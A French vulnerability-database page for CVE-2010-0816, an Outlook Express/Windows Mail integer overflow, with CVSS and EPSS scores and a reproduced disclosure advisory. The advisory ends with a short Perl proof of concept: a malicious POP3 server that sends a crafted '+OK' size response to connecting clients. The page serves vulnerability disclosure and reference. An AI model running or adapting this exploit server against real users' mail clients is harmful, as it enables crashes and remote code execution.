CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Integer overflow in inetcomm.dll in Microsoft Outlook Express 5.5 SP2, 6, and 6 SP1; Windows Live Mail on Windows XP SP2 and SP3, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7; and Windows Mail on Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote e-mail servers and man-in-the-middle attackers to execute arbitrary code via a crafted (1) POP3 or (2) IMAP response, as demonstrated by a certain +OK response on TCP port 110, aka "Outlook Express and Windows Mail Integer Overflow Vulnerability."
Category : Numeric Errors Weaknesses in this category are related to improper calculation or conversion of numbers.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
9.3
AV:N/AC:M/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
50.36%
–
–
2022-04-03
–
–
50.36%
–
–
2022-09-18
–
–
48.37%
–
–
2023-02-05
–
–
44.7%
–
–
2023-03-12
–
–
–
96.15%
–
2023-04-09
–
–
–
96.4%
–
2023-05-28
–
–
–
96.19%
–
2023-07-16
–
–
–
96.41%
–
2023-08-27
–
–
–
96.13%
–
2024-02-18
–
–
–
95.76%
–
2024-06-02
–
–
–
95.76%
–
2024-09-29
–
–
–
95.31%
–
2024-11-10
–
–
–
94.73%
–
2024-12-22
–
–
–
91.17%
–
2025-02-02
–
–
–
89.52%
–
2025-01-19
–
–
–
91.17%
–
2025-02-02
–
–
–
89.52%
–
2025-03-18
–
–
–
–
55.45%
2025-03-18
–
–
–
–
55.45,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2010-05-10 22h00 +00:00 Auteur : Francis Provencher EDB Vérifié : Yes
Application: Microsoft Outlook Express
Microsoft Windows Mail
Platforms: Windows 2000
Windows XP
Windows Vista
Windows server 2003
Windows Server 2008 SR2
Exploitation: Remote Exploitable
CVE Number: CVE-2010-0816
Discover Date: 2009-09-11
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code
#####################################################################################
=================
1) Introduction
=================
Windows Mail is an e-mail and newsgroup client included in Windows Vista, that was superseded by Windows Live Mail.
It is the successor to Outlook Express. Microsoft previewed Windows Mail on Channel 9 on October 10, 2005.[1]
Unlike Outlook Express, Windows Mail is not considered to be a component of Internet Explorer. As such, it will not
be made available for earlier Windows operating systems, while Windows Internet Explorer 7 was made available for
Windows XP.
Windows Mail has been succeeded by Windows Live Mail, which was built by the same development team as Windows Mail
and also serves as the replacement for Outlook Express for Windows XP.
(Wikipedia)
#####################################################################################
====================
2) Report Timeline
====================
2009-11-09 Vendor Contacted
2009-11-09 Vendor Response
2009-11-16 Vendor request a PoC
2009-11-16 PoC is send
2009-11-19 Vendor confirme they received PoC
2009-11-24 Vendor confirm the vulnerability
2010-05-11 Public release of this advisory
#####################################################################################
======================
3) Technical details
======================
An unauthenticated remote code execution vulnerability exists in the way that the Windows Mail Client software
handles specially crafted mail responses. An attempt to exploit the vulnerability would not require authentication,
allowing an attacker to exploit the vulnerability by sending a specially crafted response to a client initiating a
connection to a server under his control using the common mail protocols.
The vulnerability is caused by a common library used by Outlook Express and Windows Mail insufficiently validating
network data before using that data to calculate the necessary size of a buffer.
#####################################################################################
=====================
4) Product affected
=====================
Mail client; Microsoft Outlook Express & Microsoft Windows Mail
Plateforms; Vista SP1 & Windows Server 2008 SP1
#####################################################################################
=============
5) The Code
=============
#!/usr/bin/perl -w
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Microsoft Windows Mail CLient & outlook express Remote Integer Overflow
#
use IO::Socket;
$port = 110;
$serv = IO::Socket::INET->new(Proto=>'tcp',
LocalPort=>$port,
Listen=>1)
or die "Error: listen($port)\n";
$cli = $serv->accept() or die "Error: accept()\n";
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK 357913944 100\r\n");